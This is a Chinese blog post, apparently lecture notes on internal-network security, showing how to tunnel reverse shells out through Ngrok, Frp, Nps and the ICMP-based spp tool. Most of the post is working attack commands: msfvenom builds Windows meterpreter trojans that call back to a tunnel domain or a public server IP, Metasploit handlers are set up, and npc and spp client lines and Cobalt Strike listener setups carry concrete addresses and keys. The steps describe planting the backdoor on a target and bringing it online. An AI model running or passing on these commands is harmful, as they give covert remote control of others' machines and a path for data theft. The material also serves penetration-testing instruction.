内网安全【5】隧道搭建

1.内网穿透工具

Ngrok Frp Spp Nps EW(停更) 一共是这五个

优点:穿透加密数据,中间平台,防追踪,解决网络问题

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

https://github.com/esrrhs/spp

https://github.com/fatedier/frp

https://github.com/ehang-io/nps

2.Ngrok--内网穿透--上线

(1)服务端配置:

开通隧道-TCP协议-指向IP和端口-开通隧道-连接隧道

(2)客户端连接服务端:

./sunny clientid 133328291918 //控制端连接Ngrok的服务器

(3)客户端生成后门配置监听:

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10134 -f exe -o tcp.exe

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 0.0.0.0

set lport 8888

run

点击下面的链接注册账户然后去登录,登录完成之后点击隧道管理,开通隧道

Sunny-Ngrok内网转发内网穿透 - 国内内网映射服务器

下载客户端,因为攻击机是kali,所以下载linux的,此时查看状态是不在线,等客户端连接服务端之后就在线了

输入命令让客户端连接服务端

这里我们在生成木马的时候,监听地址应该写跳板机的,因为利用反向连接,目标主机找不到内网攻击机,下图可以看到写的后门会使当目标主机将权限给到这个跳板机的这个域名的时候,跳域名就会解析到刚才设置的攻击机的ip和端口。从而实现内网穿透。

隧道走的tcp,生成后门的时也要生成tcp的,ip和端口就写隧道的

本地kali开启msf监听,监听端口为生成隧道时的本地端口2222,然后服务器点击木马即可上线

3.Frp--内网穿透--上线

Frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网

(1)服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)

先把frp文件放到自己的服务器上面,然后可以看到frps.ini和frpc.ini,frps.ini是服务端的配置文件,frpc.ini是客户端的配置文件

服务端的配置文件端口是默认的7000,等会在kali客户端的配置文件也应该是7000,然后两者先建立通道(不要忘记安全组把7000端口开放)

可以看到客户端也是默认的7000,上面的ip是跳板机的ip,下面的local_port是本机接受数据的ip,remote_port是跳板机用6000端口发送给kali

也就是说跳板机的安全组要开放两个端口,一个是用于连接的7000端口,一个是发送数据的6000端口,而kali的msf监听是监听本机的5555端口

启动服务端

启动客户端

来到服务端,可以看到已经成功连接

kali启动msf生成木马,ip为服务器ip,端口为6000

监听本地5555端口,接着把后门放到目标服务器,也就是飞哥的服务器,点击后门。(因为目标主机为linux的,所以这里无论生成后门还是设置监听都要弄linux的,并且还不要生成exe文件,linux无法直接执行exe文件,建议生成elf文件)

成功的上线

4.Nps--内网穿透--上线

Nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。

(1)服务端

给nps一个执行权限,然后输入命令./nps install

输入命令,运行nps           ./nps     

使用账号密码admin/123进行登录(端口号和账号密码都是可以改的,在conf目录下的nps.conf)

(2)创建客户端,生成密匙

(3)添加协议隧道,绑定指向

远程绑定5555,指向本地6666

2.客户端

(1)连接服务端

./npc -server=47.94.236.117:8024 -vkey=uajwhbu9155qh89v

(2)生成后门

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=5555 -f exe -o nps.exe

(3)监听后门

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 6666

run

创建一个客户端,不做限制

点击隧道--

协议就选择tcp,服务器端口就是跳板机的接受端口,目标端口就是转发到哪个ip的哪个端口,这里我们不写ip就是本机,因为我们使用kali作为服务端的,所以这里就是kali本机的6666端口去接受数据。也就是说目标点击后门会把流量转发到跳板机的5566端口,然后转发到kali的6666端口,我们生成后门的时候生成5566端口的后门,好让目标去找跳板机,然后监听就监听本地的6666端口即可。

来到kali客户端,先连接到这个服务端,后面那个密钥就是刚才生成客户端的时候的密钥

显示在线

msf生成后门

点击后门之后,成功上线

5.spp--特殊协议--上线

支持的协议:tcp、udp、udp、icmp、http、kcp、quic

支持的类型:正向代理、反向代理、socks5正向代理、socks5反向代

(1)服务端:监听本地的icmp数据

./spp -type server -proto ricmp -listen 0.0.0.0

(2)客户端:将本地的8082给到117这8081上(TCP封装icmp)

spp -name "test" -type proxy_client -server 47.94.236.117 -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

(3)CS

监听器1:http 47.94.236.117 8081

监听器2:http 127.0.0.1 8082

生成后门:监听器2

这里大致过程就是利用cs监听器2生成的后门将win7的8082权限通过tcp协议移交给外网服务器的8081端口,但是因为spp项目的干扰,把tcp伪装成icmp协议发送了出去,然后服务器通过spp项目直接监听icmp的包,然后cs就会通过监听器1上线(这里cs服务端是外网的服务器)

这里我们现在服务器开启监听

在win7上面执行命令

然后cs设置两个监听器,监听器2生成后门,win7点击后门,监听器1上线。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/35182.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

计算机网络之数据通信原理(中)

上节内容传送口:数据通信原理基础 1.数据传输方式 1.1并行传输 并行传输: 字符编码的各个比特同时传输 特点: 一个比特时间内可传输一个字符,传输速度快,每个比特传输要求一个单独的信道支持,通信成本高&#xf…

探索网络爬虫技术:原理、实践与挑战

一、引言 在数字化时代,信息如同潮水般汹涌而来。过去,我们可能依赖书籍、报纸或电视来获取信息,但这些渠道的信息量有限,而且筛选过的信息未必能满足我们的需求。如今,互联网为我们提供了海量的信息,但同…

【Sklearn驯化-聚类指标】搞懂机器学习中聚类算法评估指标,轮廓系数、戴维森堡丁指数

【Sklearn驯化-聚类指标】搞懂机器学习中聚类算法评估指标,轮廓系数、戴维森堡丁指数 本次修炼方法请往下查看 🌈 欢迎莅临我的个人主页 👈这里是我工作、学习、实践 IT领域、真诚分享 踩坑集合,智慧小天地! &#…

快来看,错过了今天就要设置为vip文章了---云原生重塑架构:AutoMQ 基于云构建十倍降本的 Kafka

Apache Kafka在数据流处理系统中的核心地位 Apache Kafka已成为大数据和流计算领域的行业事实标准,其重要性在数据流处理系统中不言而喻。随着数字化转型的加速,越来越多的企业选择基于Kafka来构建其在线业务消息传递系统,使其成为数字化转型…

一文梳理有效提升RAG效果的方法

来源:一文梳理有效提升RAG效果的方法 在大模型实际落地的时候,存在一些问题,主要集中在以下方面: 缺少垂直领域知识:虽然大模型压缩了大量的人类知识,但在垂直场景上明显存在短板,需要专业化的…

如何通过小猪APP分发轻松实现应用内测分发

搞应用开发的朋友们,都知道内测分发这个环节有多重要。没有内测,一款应用基本上是不可能上线的。毕竟,谁也不想自己的产品在上线的那一刻就被用户吐槽得体无完肤。内测分发的好坏,直接影响到应用的质量和用户的第一印象。如何才能…

Web自动化元素定位之xpath定位【超详细】

🍅 视频学习:文末有免费的配套视频可观看 🍅 点击文末小卡片,免费获取软件测试全套资料,资料在手,涨薪更快 Web自动化常见的定位方式 为什么要学习定位 1.让程序操作指定元素,就必须先找到此元…

Linux文件IO深入剖析

目录 一、文件IO引发的项目血案 1、分析 一、Linux文件系统基本概念 1、文件系统接口 2、文件系统缓存 二、文件IO 访问方式概述 1、标准文件访问方式 2、直接IO 3、实现方式 4、缓存同步 5、Linux 文件IO流程图 6、血案解决 一、文件IO引发的项目血案 事件经过&am…

MTK平台Android13实现三方launcher为默认

一、前言 目前有遇到客户的定制需求,希望使用三方的launcher作为默认的launcher使用,一般情况下直接将三方launcher通过内置到系统并通过overlay机制即可很方便的实现launcher的替换,但是存在一个问题,需要增加ROM的维护成本。本文通过设备在使用前联网通过后台下发三方lau…

Potato(土豆)一款轻量级的开源文本标注工具

项目介绍: Potato 是一款轻量级、可移植的Web文本标注工具,被EMNLP 2022 DEMO赛道接受。它旨在帮助用户快速地从零开始创建和部署各种文本标注任务,无需复杂的编程或网页设计。只需简单配置,团队即可在几分钟内启动并运行标注项目…

【论文速读】| LLAMAFUZZ:大语言模型增强的灰盒模糊测试

本次分享论文:LLAMAFUZZ: Large Language Model Enhanced Greybox Fuzzing 基本信息 原文作者:Hongxiang Zhang, Yuyang Rong, Yifeng He, Hao Chen 作者单位:University of California, Davis 关键词:模糊测试,大…

云动态摘要 2024-06-27

给您带来云厂商的最新动态,最新产品资讯和最新优惠更新。 最新产品更新 veLinux 2.0 镜像邀测发布 火山引擎 2024-06-26 veLinux 2.0 镜像邀测发布 ECS支持100台实例批量续费/退订 火山引擎 2024-06-26 ECS支持100台实例批量续费/退订 弹性伸缩支持目标追踪规则(邀测) …

花8000元去培训机构学习网络安全值得吗,学成后就业前景如何?

我就是从培训机构学的网络安全,线下五六个月,当时学费不到一万,目前已成功入行。所以,只要你下决心要入这一行,过程中能好好学,那这8000就花得值~ 因为只要学得好,工作两个多月就能赚回学费&am…

Shell (一)Ubuntu的网络配置及软件安装

Ubuntu的配置及软件安装 网络配置 虚拟机提供的网络类型 桥接模式 主机和虚拟机分别拥有不同的ip地址,可以实现和外界设备通信 NAT模式 也可以联网,但是和主机共用同一个ip地址,外界无法识别虚拟机和主机发送的信息 仅主机模式 虚拟机不可…

数据资产与人工智能的融合之路:探讨如何结合AI技术优化数据资产管理,提升企业智能化水平

目录 一、引言 二、数据资产管理的现状与挑战 1、数据资产管理的重要性 2、数据资产管理的挑战 三、人工智能在数据资产管理中的应用 1、数据采集与整合 2、数据清洗与校验 3、数据安全与隐私保护 4、数据分析与挖掘 四、结合AI技术优化数据资产管理的策略 1、制定数…

【stm32-新建工程-HAL库版本】

stm32-新建工程-HAL库版本 ■ 1. 下载STM32Cube官方固件包(F1/F4/F7/H7)■ 2. 新建HAL库版本MDK工程所需的文件夹■ 2.1 新建工程文件- XXX项目并在下面新建如下文件夹■ 2.2 向Drivers文件添加如下文件■ 2.3 向Mrddlewares文件添加文件■ 2.4 设置Outp…

一篇文章带你玩懂数据库的基础函数

数据库的函数 单行函数1.数据函数2.字符串函数3.时间函数4.流程函数 多行函数聚合函数 阅读指南: 本文章讲述了对于数据库的单行和多行函数,如果读者感兴趣,后续我们会更新高级的操作在我们的对于数据库教程的合集中,大家可以来很…

唐兴通:银行金融数字化转型营销客户销售个金对公讲师培训师

唐兴通 数字化转型顾问、金融产品营销专家、数字化销售增长教练、沃顿商学院演讲嘉宾。全球创新增长战略大家EM罗杰斯(创新的扩散)、杰弗里摩尔(跨越鸿沟)、亨利切萨布鲁夫(开放式创新)在中国合作者。《中…

秋招倒计时?到底需要准备到什么程度?

秋招倒计时?需要准备到什么程度? 秋招,面向全国的毕业生,招聘的激烈程度可想而知!按照往年时间,秋招通常从八月初开始,九月黄金期,十月中后期。距今刚好差不多60天,时间其…

【PyScript】PyScript 基础入门

【PyScript】PyScript 基础入门 PyScript 是一个为了支持 Python 运行在浏览器的开源平台。 1.PyScript 应用程序的创建 PyScript 程序需要以下三个内容 一个提供给浏览器的 index.html 文件。PyScript 的运行环境描述,通常是一个 pyscript.json 或 pyscript.to…